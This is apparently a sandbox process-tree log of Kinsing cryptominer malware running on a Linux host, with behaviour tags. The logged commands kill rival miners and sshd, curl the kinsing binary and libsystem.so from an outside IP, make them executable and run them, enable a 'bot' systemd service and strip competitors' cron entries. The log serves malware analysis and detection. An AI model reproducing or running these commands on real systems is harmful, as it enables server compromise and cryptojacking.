/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1440
-
-
/usr/bin/idid -u2⤵PID:1441
-
-
/usr/bin/sudosudo mkdir /etc/data2⤵
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
PID:1442 -
/usr/sbin/sendmailsendmail -t3⤵PID:1445
-
/usr/sbin/exim4/usr/sbin/exim4 -Mc 1tmOVm-0000NJ-Hk4⤵
- Reads CPU attributes
PID:1459
-
-
-
/usr/sbin/sendmailsendmail -t3⤵PID:1448
-
/usr/sbin/exim4/usr/sbin/exim4 -Mc 1tmOVm-0000NM-Hm4⤵
- Reads CPU attributes
PID:1460
-
-
-
/bin/mkdirmkdir /etc/data3⤵PID:1449
-
-
-
/usr/bin/idid -u2⤵PID:1450
-
-
/bin/unameuname -i2⤵
- Attempts to change immutable files
PID:1451
-
-
/bin/unameuname -m2⤵PID:1452
-
-
/bin/grepgrep -e /dev2⤵PID:1455
-
-
/bin/lsls -la /etc/data2⤵PID:1454
-
-
/bin/grepgrep -v grep2⤵PID:1456
-
-
/usr/bin/pkillpkill -f sshd2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1457
-
-
/usr/bin/pkillpkill -f htop2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1458
-
-
/usr/bin/pkillpkill -f linuxsys2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1462
-
-
/usr/bin/pkillpkill -f kthreaddo2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1463
-
-
/usr/bin/pkillpkill -f donkey2⤵
- Reads CPU attributes
PID:1464
-
-
/usr/bin/pkillpkill -f sysupdater2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1465
-
-
/usr/bin/pkillpkill -f php-update.service2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1466
-
-
/usr/bin/pkillpkill -f update-setup2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1469
-
-
/bin/grepgrep :14142⤵PID:1471
-
-
/bin/grepgrep -v -2⤵PID:1474
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1472
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1473
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1475
-
-
/bin/grepgrep rtw88_pcied2⤵PID:1477
-
-
/bin/grepgrep -v grep2⤵PID:1478
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1480
-
-
/usr/bin/awkawk "{print \$1}"2⤵PID:1479
-
-
/bin/psps ax2⤵
- Reads CPU attributes
PID:1476
-
-
/bin/grepgrep -v grep2⤵PID:1483
-
-
/usr/bin/awkawk "{print \$1}"2⤵PID:1484
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1485
-
-
/bin/grepgrep stratum2⤵PID:1482
-
-
/bin/psps ax2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1481
-
-
/bin/grepgrep Sofia2⤵PID:1487
-
-
/usr/bin/awkawk "{print \$1}"2⤵PID:1489
-
-
/bin/psps ax2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1486
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1490
-
-
/bin/grepgrep -v grep2⤵PID:1488
-
-
/usr/bin/pkillpkill -f Sofia2⤵
- Reads CPU attributes
PID:1491
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1495
-
-
/bin/grepgrep -v grep2⤵PID:1494
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1496
-
-
/bin/grepgrep tracepath2⤵PID:1493
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1492
-
-
/bin/grepgrep -v grep2⤵PID:1499
-
-
/bin/grepgrep /dot2⤵PID:1498
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1500
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1501
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1497
-
-
/bin/grepgrep -v grep2⤵PID:1504
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1505
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1506
-
-
/bin/grepgrep "php-fpm pool www"2⤵PID:1503
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1502
-
-
/bin/grepgrep -v grep2⤵PID:1509
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1510
-
-
/bin/grepgrep "Cli start accept"2⤵PID:1508
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1511
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:1507
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1515
-
-
/bin/grepgrep -v grep2⤵PID:1514
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1516
-
-
/bin/grepgrep "bash -k"2⤵PID:1513
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1512
-
-
/bin/grepgrep perfctl2⤵PID:1518
-
-
/bin/grepgrep -v grep2⤵PID:1519
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1517
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1520
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1521
-
-
/usr/bin/pkillpkill -f hezb2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1522
-
-
/usr/bin/pkillpkill -f /tmp/.out2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1523
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1527
-
-
/bin/grepgrep -v grep2⤵PID:1526
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1528
-
-
/bin/grepgrep ./ll12⤵PID:1525
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1524
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1533
-
-
/usr/bin/awkawk "{if(\$3>80.0) print \$2}"2⤵PID:1532
-
-
/bin/grepgrep -v grep2⤵PID:1531
-
-
/bin/grepgrep agetty2⤵PID:1530
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1529
-
-
/usr/bin/pkillpkill -f 42.112.28.2162⤵
- Reads CPU attributes
- Reads runtime system information
PID:1534
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1537
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1538
-
-
/bin/grepgrep 207.38.87.62⤵PID:1536
-
-
/bin/grepgrep -v -2⤵PID:1539
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1540
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1544
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1543
-
-
/bin/grepgrep 23.94.214.1192⤵PID:1542
-
-
/bin/grepgrep -v -2⤵PID:1545
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1546
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1550
-
-
/bin/grepgrep 127.0.0.1:520182⤵PID:1548
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1549
-
-
/bin/grepgrep -v -2⤵PID:1551
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1552
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1555
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1556
-
-
/bin/grepgrep 34.81.218.76:94862⤵PID:1554
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1558
-
-
/bin/grepgrep -v -2⤵PID:1557
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1561
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1562
-
-
/bin/grepgrep 42.112.28.216:94862⤵PID:1560
-
-
/bin/grepgrep -v -2⤵PID:1563
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1564
-
-
/usr/bin/pkillpkill -f .git/kthreaddw2⤵
- Reads CPU attributes
PID:1565
-
-
/usr/bin/pkillpkill -f 80.211.206.1052⤵
- Reads CPU attributes
- Reads runtime system information
PID:1566
-
-
/usr/bin/pkillpkill -f 207.38.87.62⤵
- Reads CPU attributes
- Reads runtime system information
PID:1567
-
-
/usr/bin/pkillpkill -f p84442⤵
- Reads CPU attributes
PID:1568
-
-
/usr/bin/pkillpkill -f supportxmr2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1569
-
-
/usr/bin/pkillpkill -f monero2⤵
- Reads runtime system information
PID:1570
-
-
/usr/bin/pkillpkill -f kthreaddi2⤵
- Reads CPU attributes
PID:1571
-
-
/usr/bin/pkillpkill -f srv002⤵
- Reads CPU attributes
PID:1572
-
-
/usr/bin/pkillpkill -f /tmp/.javae/javae2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1573
-
-
/usr/bin/pkillpkill -f .javae2⤵
- Reads CPU attributes
PID:1574
-
-
/usr/bin/pkillpkill -f .syna2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1575
-
-
/usr/bin/pkillpkill -f xmm2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1576
-
-
/usr/bin/pkillpkill -f solr.sh2⤵
- Reads CPU attributes
PID:1577
-
-
/usr/bin/pkillpkill -f /tmp/.solr/solrd2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1578
-
-
/usr/bin/pkillpkill -f /tmp/javac2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1579
-
-
/usr/bin/pkillpkill -f /tmp/.go.sh2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1580
-
-
/usr/bin/pkillpkill -f /tmp/.x/agetty2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1581
-
-
/usr/bin/pkillpkill -f /tmp/.x/kworker2⤵
- Reads CPU attributes
PID:1582
-
-
/usr/bin/pkillpkill -f c3pool2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1583
-
-
/usr/bin/pkillpkill -f /tmp/.X11-unix/gitag-ssh2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1584
-
-
/usr/bin/pkillpkill -f /tmp/12⤵
- Reads CPU attributes
- Reads runtime system information
PID:1585
-
-
/usr/bin/pkillpkill -f /tmp/okk.sh2⤵
- Reads CPU attributes
PID:1586
-
-
/usr/bin/pkillpkill -f /tmp/gitaly2⤵
- Reads CPU attributes
PID:1587
-
-
/usr/bin/pkillpkill -f /tmp/.x/kworker2⤵
- Reads CPU attributes
PID:1588
-
-
/usr/bin/pkillpkill -f 43a6eY5zPm3UFCaygfsukfP94ZTHz6a1kZh5sm1aZFB2⤵
- Reads CPU attributes
PID:1589
-
-
/usr/bin/pkillpkill -f /tmp/.X11-unix/supervise2⤵
- Reads CPU attributes
PID:1590
-
-
/usr/bin/pkillpkill -f /tmp/.ssh/redis.sh2⤵
- Reads CPU attributes
PID:1591
-
-
/bin/grepgrep ./udp2⤵PID:1593
-
-
/bin/grepgrep -v grep2⤵PID:1594
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1592
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1595
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1596
-
-
/bin/sedsed -i "s/^0//" /tmp/.X11-unix/012⤵
- Attempts to change immutable files
PID:1597
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1599
-
-
/bin/catcat /tmp/.X11-unix/012⤵PID:1598
-
-
/bin/sedsed -i "s/^0//" /tmp/.X11-unix/112⤵
- Attempts to change immutable files
PID:1600
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1602
-
-
/bin/catcat /tmp/.X11-unix/112⤵PID:1601
-
-
/bin/sedsed -i "s/^0//" /tmp/.X11-unix/222⤵
- Attempts to change immutable files
PID:1603
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1605
-
-
/bin/catcat /tmp/.X11-unix/222⤵PID:1604
-
-
/bin/sedsed -i "s/^0//" /tmp/.systemd.12⤵
- Attempts to change immutable files
PID:1606
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1608
-
-
/bin/catcat /tmp/.systemd.12⤵PID:1607
-
-
/bin/sedsed -i "s/^0//" /tmp/.systemd.22⤵
- Attempts to change immutable files
PID:1609
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1611
-
-
/bin/catcat /tmp/.systemd.22⤵PID:1610
-
-
/bin/sedsed -i "s/^0//" /tmp/.systemd.32⤵
- Attempts to change immutable files
PID:1612
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1614
-
-
/bin/catcat /tmp/.systemd.32⤵PID:1613
-
-
/bin/catcat /tmp/.systemd.12⤵PID:1615
-
-
/bin/catcat /tmp/.systemd.22⤵PID:1616
-
-
/bin/catcat /tmp/.systemd.32⤵PID:1617
-
-
/bin/sedsed -i "s/^0//" /tmp/.pg_stat.02⤵
- Attempts to change immutable files
PID:1618
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1620
-
-
/bin/catcat /tmp/.pg_stat.02⤵PID:1619
-
-
/bin/sedsed -i "s/^0//" /tmp/.pg_stat.12⤵
- Attempts to change immutable files
PID:1621
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1623
-
-
/bin/catcat /tmp/.pg_stat.12⤵PID:1622
-
-
/bin/sedsed -i "s/^0//" /data/./oka.pid2⤵
- Attempts to change immutable files
PID:1624
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1626
-
-
/bin/catcat /data/./oka.pid2⤵PID:1625
-
-
/bin/sedsed -i "s/^0//" /tmp/.ICE-unix/d2⤵
- Attempts to change immutable files
PID:1627
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1629
-
-
/bin/catcat /tmp/.ICE-unix/d2⤵PID:1628
-
-
/bin/sedsed -i "s/^0//" /tmp/.ICE-unix/m2⤵
- Attempts to change immutable files
PID:1630
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1632
-
-
/bin/catcat /tmp/.ICE-unix/m2⤵PID:1631
-
-
/usr/bin/pkillpkill -f zsvc2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1633
-
-
/usr/bin/pkillpkill -f pdefenderd2⤵
- Reads CPU attributes
PID:1634
-
-
/usr/bin/pkillpkill -f updatecheckerd2⤵
- Reads CPU attributes
PID:1635
-
-
/usr/bin/pkillpkill -f cruner2⤵
- Reads CPU attributes
PID:1636
-
-
/usr/bin/pkillpkill -f dbused2⤵
- Reads CPU attributes
PID:1637
-
-
/usr/bin/pkillpkill -f bashirc2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1638
-
-
/usr/bin/pkillpkill -f meminitsrv2⤵
- Reads CPU attributes
PID:1639
-
-
/bin/grepgrep -v grep2⤵PID:1642
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1643
-
-
/bin/grepgrep ./oka2⤵PID:1641
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1644
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1640
-
-
/bin/grepgrep -v grep2⤵PID:1647
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1648
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1649
-
-
/bin/grepgrep "postgres: autovacum"2⤵PID:1646
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1645
-
-
/bin/grepgrep -v bin2⤵PID:1652
-
-
/bin/grepgrep -v "\\["2⤵PID:1653
-
-
/usr/bin/awkawk "length(\$1) == 8"2⤵PID:1651
-
-
/bin/grepgrep -v "("2⤵PID:1654
-
-
/bin/grepgrep -v php-fpm2⤵PID:1655
-
-
/bin/psps ax -o "command,pid" -www2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1650
-
-
/bin/grepgrep -v proxymap2⤵PID:1656
-
-
/bin/grepgrep -v postgres2⤵PID:1657
-
-
/bin/grepgrep -v postgrey2⤵PID:1658
-
-
/bin/grepgrep -v kinsing2⤵PID:1659
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1660
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1661
-
-
/bin/grepgrep -v bin2⤵PID:1664
-
-
/bin/grepgrep -v "\\["2⤵PID:1665
-
-
/bin/grepgrep -v "("2⤵PID:1666
-
-
/usr/bin/awkawk "length(\$1) == 16"2⤵PID:1663
-
-
/bin/psps ax -o "command,pid" -www2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1662
-
-
/bin/grepgrep -v php-fpm2⤵PID:1667
-
-
/bin/grepgrep -v proxymap2⤵PID:1668
-
-
/bin/grepgrep -v postgres2⤵PID:1669
-
-
/bin/grepgrep -v postgrey2⤵PID:1670
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1671
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1672
-
-
/bin/grepgrep -v bin2⤵PID:1675
-
-
/bin/grepgrep -v "\\["2⤵PID:1676
-
-
/usr/bin/awkawk "length(\$5) == 8"2⤵PID:1674
-
-
/bin/grepgrep -v php-fpm2⤵PID:1678
-
-
/bin/grepgrep -v "("2⤵PID:1677
-
-
/bin/psps ax2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1673
-
-
/bin/grepgrep -v proxymap2⤵PID:1679
-
-
/bin/grepgrep -v postgres2⤵PID:1680
-
-
/bin/grepgrep -v postgrey2⤵PID:1681
-
-
/usr/bin/awkawk "{print \$1}"2⤵PID:1682
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1683
-
-
/bin/grepgrep /tmp/sscks2⤵PID:1686
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1687
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1688
-
-
/bin/grepgrep -v grep2⤵PID:1685
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1684
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1692
-
-
/usr/bin/md5summd5sum /etc/data/kinsing2⤵PID:1691
-
-
/bin/rmrm -rf /etc/data/kinsing2⤵PID:1693
-
-
/bin/chmodchmod 777 /etc/data/kinsing2⤵
- File and Directory Permissions Modification
PID:1694
-
-
/usr/bin/curlcurl -o /etc/data/kinsing http://194.38.22.120/kinsing2⤵PID:1695
-
-
/bin/chmodchmod +x /etc/data/kinsing2⤵
- File and Directory Permissions Modification
PID:1696
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1700
-
-
/usr/bin/md5summd5sum /etc/data/kinsing2⤵PID:1699
-
-
/usr/bin/md5summd5sum /etc/data/libsystem.so2⤵PID:1703
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1704
-
-
/bin/chmodchmod 777 /etc/data/libsystem.so2⤵
- File and Directory Permissions Modification
PID:1705
-
-
/usr/bin/curlcurl -o /etc/data/libsystem.so http://194.38.22.120/libsystem.so2⤵PID:1706
-
-
/bin/chmodchmod +x /etc/data/libsystem.so2⤵
- File and Directory Permissions Modification
PID:1707
-
-
/usr/bin/md5summd5sum /etc/data/libsystem.so2⤵PID:1710
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1711
-
-
/bin/chmodchmod 777 /etc/data/libsystem.so2⤵
- File and Directory Permissions Modification
PID:1712
-
-
/usr/bin/curlcurl -o /etc/data/libsystem.so http://194.38.22.120/libsystem.so2⤵PID:1713
-
-
/bin/chmodchmod +x /etc/data/libsystem.so2⤵
- File and Directory Permissions Modification
PID:1714
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1718
-
-
/usr/bin/md5summd5sum /etc/data/libsystem.so2⤵PID:1717
-
-
/bin/rmrm -rf /tmp/kdevtmpfsi2⤵PID:1719
-
-
/bin/chmodchmod 777 /etc/data/kinsing2⤵
- File and Directory Permissions Modification
PID:1720
-
-
/bin/chmodchmod +x /etc/data/kinsing2⤵
- File and Directory Permissions Modification
PID:1721
-
-
/etc/data/kinsing/etc/data/kinsing2⤵PID:1722
-
-
/usr/bin/idid -u2⤵PID:1724
-
-
/bin/systemctlsystemctl enable bot2⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:1725
-
-
/bin/systemctlsystemctl start bot2⤵
- Enumerates kernel/hardware configuration
PID:1738
-
-
/bin/sedsed /base64/d2⤵PID:1743
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1744
-
-
/usr/bin/crontabcrontab -l2⤵PID:1742
-
-
/bin/sedsed /_cron/d2⤵PID:1746
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1747
-
-
/usr/bin/crontabcrontab -l2⤵PID:1745
-
-
/bin/sedsed /31.210.20.181/d2⤵PID:1749
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1750
-
-
/usr/bin/crontabcrontab -l2⤵PID:1748
-
-
/bin/sedsed /update.sh/d2⤵PID:1752
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1753
-
-
/usr/bin/crontabcrontab -l2⤵PID:1751
-
-
/bin/sedsed /logo4/d2⤵PID:1755
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1756
-
-
/usr/bin/crontabcrontab -l2⤵PID:1754
-
-
/bin/sedsed /logo9/d2⤵PID:1758
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1759
-
-
/usr/bin/crontabcrontab -l2⤵PID:1757
-
-
/bin/sedsed /logo0/d2⤵PID:1761
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1762
-
-
/usr/bin/crontabcrontab -l2⤵PID:1760
-
-
/bin/sedsed /logo/d2⤵PID:1764
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1765
-
-
/usr/bin/crontabcrontab -l2⤵PID:1763
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1768
-
-
/bin/sedsed /tor2web/d2⤵PID:1767
-
-
/usr/bin/crontabcrontab -l2⤵PID:1766
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1771
-
-
/bin/sedsed /jpg/d2⤵PID:1770
-
-
/usr/bin/crontabcrontab -l2⤵PID:1769
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1774
-
-
/bin/sedsed /png/d2⤵PID:1773
-
-
/usr/bin/crontabcrontab -l2⤵PID:1772
-
-
/bin/sedsed /tmp/d2⤵PID:1776
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1777
-
-
/usr/bin/crontabcrontab -l2⤵PID:1775
-
-
/bin/sedsed /zmreplchkr/d2⤵PID:1779
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1780
-
-
/usr/bin/crontabcrontab -l2⤵PID:1778
-
-
/bin/sedsed /aliyun.one/d2⤵PID:1782
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1783
-
-
/usr/bin/crontabcrontab -l2⤵PID:1781
-
-
/bin/sedsed /3.215.110.66.one/d2⤵PID:1785
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1786
-
-
/usr/bin/crontabcrontab -l2⤵PID:1784
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1789
-
-
/bin/sedsed /pastebin/d2⤵PID:1788
-
-
/usr/bin/crontabcrontab -l2⤵PID:1787
-
-
/bin/sedsed /onion/d2⤵PID:1791
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1792
-
-
/usr/bin/crontabcrontab -l2⤵PID:1790
-
-
/bin/sedsed /lsd.systemten.org/d2⤵PID:1794
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1795
-
-
/usr/bin/crontabcrontab -l2⤵PID:1793
-
-
/bin/sedsed /shuf/d2⤵PID:1797
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1798
-
-
/usr/bin/crontabcrontab -l2⤵PID:1796
-
-
/bin/sedsed /ash/d2⤵PID:1800
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1801
-
-
/usr/bin/crontabcrontab -l2⤵PID:1799
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1804
-
-
/bin/sedsed /mr.sh/d2⤵PID:1803
-
-
/usr/bin/crontabcrontab -l2⤵PID:1802
-
-
/bin/sedsed /185.181.10.234/d2⤵PID:1806
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1807
-
-
/usr/bin/crontabcrontab -l2⤵PID:1805
-
-
/bin/sedsed /localhost.xyz/d2⤵PID:1809
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1810
-
-
/usr/bin/crontabcrontab -l2⤵PID:1808
-
-
/bin/sedsed /45.137.151.106/d2⤵PID:1812
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1813
-
-
/usr/bin/crontabcrontab -l2⤵PID:1811
-
-
/bin/sedsed /111.90.159.106/d2⤵PID:1815
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1816
-
-
/usr/bin/crontabcrontab -l2⤵PID:1814
-
-
/bin/sedsed /github/d2⤵PID:1818
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1819
-
-
/usr/bin/crontabcrontab -l2⤵PID:1817
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1822
-
-
/usr/bin/crontabcrontab -l2⤵PID:1820
-
-
/bin/sedsed /bigd1ck.com/d2⤵PID:1821
-
-
/bin/sedsed /xmr.ipzse.com/d2⤵
- System Network Configuration Discovery
PID:1827
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1828
-
-
/usr/bin/crontabcrontab -l2⤵PID:1826
-
-
/bin/sedsed /185.181.10.234/d2⤵PID:1830
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1831
-
-
/usr/bin/crontabcrontab -l2⤵PID:1829
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1834
-
-
/bin/sedsed /91.241.19.134/d2⤵PID:1833
-
-
/usr/bin/crontabcrontab -l2⤵PID:1832
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1837
-
-
/bin/sedsed /122.51.164.83/d2⤵PID:1836
-
-
/usr/bin/crontabcrontab -l2⤵PID:1835
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1840
-
-
/bin/sedsed /185.191.32.198/d2⤵PID:1839
-
-
/usr/bin/crontabcrontab -l2⤵PID:1838
-
-
/bin/sedsed /newdat.sh/d2⤵PID:1842
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1843
-
-
/usr/bin/crontabcrontab -l2⤵PID:1841
-
-
/bin/sedsed /lib.pygensim.com/d2⤵PID:1845
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1846
-
-
/usr/bin/crontabcrontab -l2⤵PID:1844
-
-
/bin/sedsed /t.amynx.com/d2⤵PID:1848
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1849
-
-
/usr/bin/crontabcrontab -l2⤵PID:1847
-
-
/bin/sedsed /update.sh/d2⤵PID:1851
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1852
-
-
/usr/bin/crontabcrontab -l2⤵PID:1850
-
-
